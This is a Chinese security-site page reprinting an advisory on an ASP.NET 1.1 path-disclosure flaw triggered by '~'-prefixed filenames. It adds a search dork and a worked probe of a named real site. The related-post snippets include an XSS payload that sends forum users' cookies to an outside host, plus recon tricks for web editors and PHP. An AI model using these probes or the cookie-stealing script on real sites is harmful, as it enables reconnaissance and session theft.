NET IIS暴绝对路径漏洞

Title:Microsoft ASP.NET May Disclose Web Directory to Remote Users in Certain Cases
Description: If the ASP.NET application does not filter the error message, the web 
directory information may be disclosed to remote users by using an unavailable file 
which start with "~".
Hi, I'm Soroush Dalili from GrayHatz Security Group(GSG).I found new thing in .NET 
Framework Version:1.1 (.ASPX Files).
If error mode in .net configuration is on, Run an unavailable aspx file that start with 
"~" can cause showing full path in browsers.
For Example: Http://[URL]/~foo.aspx
------------------------------------------------------------------------
Note:Version 2 have not this bug and it return file does not exist

Vendor URL: www.microsoft.com
Version:1.1
Soloution: Update to version 2 or enable error filtering
Finder: Soroush Dalili
Team: GSG [GrayHatz Security group]
Web: grayhatz.net
Country: Iran
Email: Irsdl[a.t]yahoo[d.o.t]com

搜索引擎 inurl:aspx,然后随便点个连接,在url后输入~fly_ocean.aspx,即可暴出绝对路径。

例如:
http://www.fodonline.com/qihuoju/default.aspx~fly_ocean.aspx
用于监视的文件名无效:“D:\aaa\qihuoju\default.aspx~fly_ocean.aspx”。用于监视的文件名必须具有绝对路径,并且不包含通配符。 
版本信息: Microsoft .NET Framework 版本:1.1.4322.2300; ASP.NET 版本:1.1.4322.2300

(0)

相关推荐

  • NET IIS暴绝对路径漏洞

    Title:Microsoft ASP.NET May Disclose Web Directory to Remote Users in Certain Cases Description: If the ASP.NET application does not filter the error message, the web  directory information may be disclosed to remote users by using an unavailable fil

  • Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

    漏洞发现:LiNZI[B.C.T]@www.cnbct.org 厂商名字:动网先锋论谈 厂商地址:http://www.dvbbs.net/ 漏洞程序:Dvbbs 7.1.0 漏洞描述: Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等. 漏洞利用例子: 一.泄露绝对漏洞测试: 对官方的测试站点:bbs.dvbbs.net 上传一张图,代码如下: GIF89a <script>alert(document.cookie)</

  • IIS下ASP目录漏洞和IIS分号漏洞(;)的临时解决方法

    解决方法: 下载 银月服务器工具,使用工具->组件下载器下载ISAPI_Rewrite,解压出来. 把ISAPI_Rewrite中的ISAPI_Rewrite.dll添加为ISAPI,名字为ISAPI_Rewrite,这就是伪静态,做过的不用安装了 下载漏洞补丁包,即下图选择的项目,下载打开! 把ISAPI_Rewrite目录中的httpd.ini替换成补丁包中的httpd.ini. 或者保证ISAPI_Rewrite下面的httpd.ini有下图选择的两行规则也行!这样就能防止这两个IIS漏洞

  • 常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor

    FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&Curren

  • PHP爆绝对路径方法收集整理

    1.单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息. Eg: www.xxx.com/news.php?id=149′ 2.错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1.单引号被过滤时不妨试试. Eg: www.xxx.com/researcharchive.php?id=-1 3.Google爆路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error.注意,

  • IIS php环境配置PHP5 MySQL5 ZendOptimizer phpmyadmin安装与配置

    本例是在wiondws XP下 IIS5.1 php5.2.1(zip) MySQL5.0.37 phpmyadmin2.10.0.2 ZendOptimizer-3.2.6 的安装与配置 IIS 的安装 1 在光驱中放入WindowsXP SP2系统安装光盘 2 依次在 控制面板 > 添加与删除 > 添加/删除Windows组件 > Windows组件向导 中选中 Internet信息服务(IIS) 3 点击 下一步 进行文件复制,直到完成安装 4 完成 IIS 安装 5 打开浏览器,

  • 关于动网的cookie泻露站点绝路径的问题

    一.跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565777847.jpg 图二则是偶的个人照 U

  • IIS日志清理(CMD版,VBS版,JS版,WSH版)

    应用场合:主要用与虚拟主机,也可用于个人服务器 产生背景:2005 年某月某日,一向运行正常的虚拟主机死机了,让机房值班人员重启数次,都不成,接显示器进系统看,提示:C盘空间不足,半夜还得去机房处理,到机房后先断网,再进系统发现有两个地方有问题,C:\WINDOWS\system32\LogFiles文件有6G,还有一个就是Symantec隔离病毒的地方,到网上找了下,最大可能性是我们的虚拟主机的所有日志都写在这里,并且没人知道写在这里,郁闷,在IIS里看了下,还真是这么回事,日志天天都在长,当

  • 在IIS6中启用父路径,不被黑客利用

    之所以暂停是为了防止操作时遭攻击然后,在根目录下创建虚拟路径"..",任意选择一个原目录,并将它的所有权限取消即可.经测试,这样虽然可以用父路径,但若访问根目录的父路径,则会出现"您无权查看该网页"的错误.因为根目录下的父路径会被以为成虚拟路径"..",而其他路径下则可以用父路径. 此方法在Windows Server 2003, Enterprise Edition, Service Pack 2的自带IIS中测试通过. iis6中启动父路径的

  • IIS 配置问题 一些iis常见问题的解决方法

    1.iis6.0和5.0都不能装在XP系统中 2.下载了后不知道怎么安装 3.安装过程中弹出文件无法复制的对话框和什么系统被修改,是否继续的对话框,很是郁闷 4.安装后internet信息服务器中没有默认网站 5.安装后在地址栏中输入http://localhost出现Server Application Error 错误即500 错误 6.安装后默认网站无法启动 再说说这些问题的解决方法 问题一:1 在你装IIS之前需要知道你的系统是什么样的,HOME版的好想不能装,可好象网上也有装的方法,我

随机推荐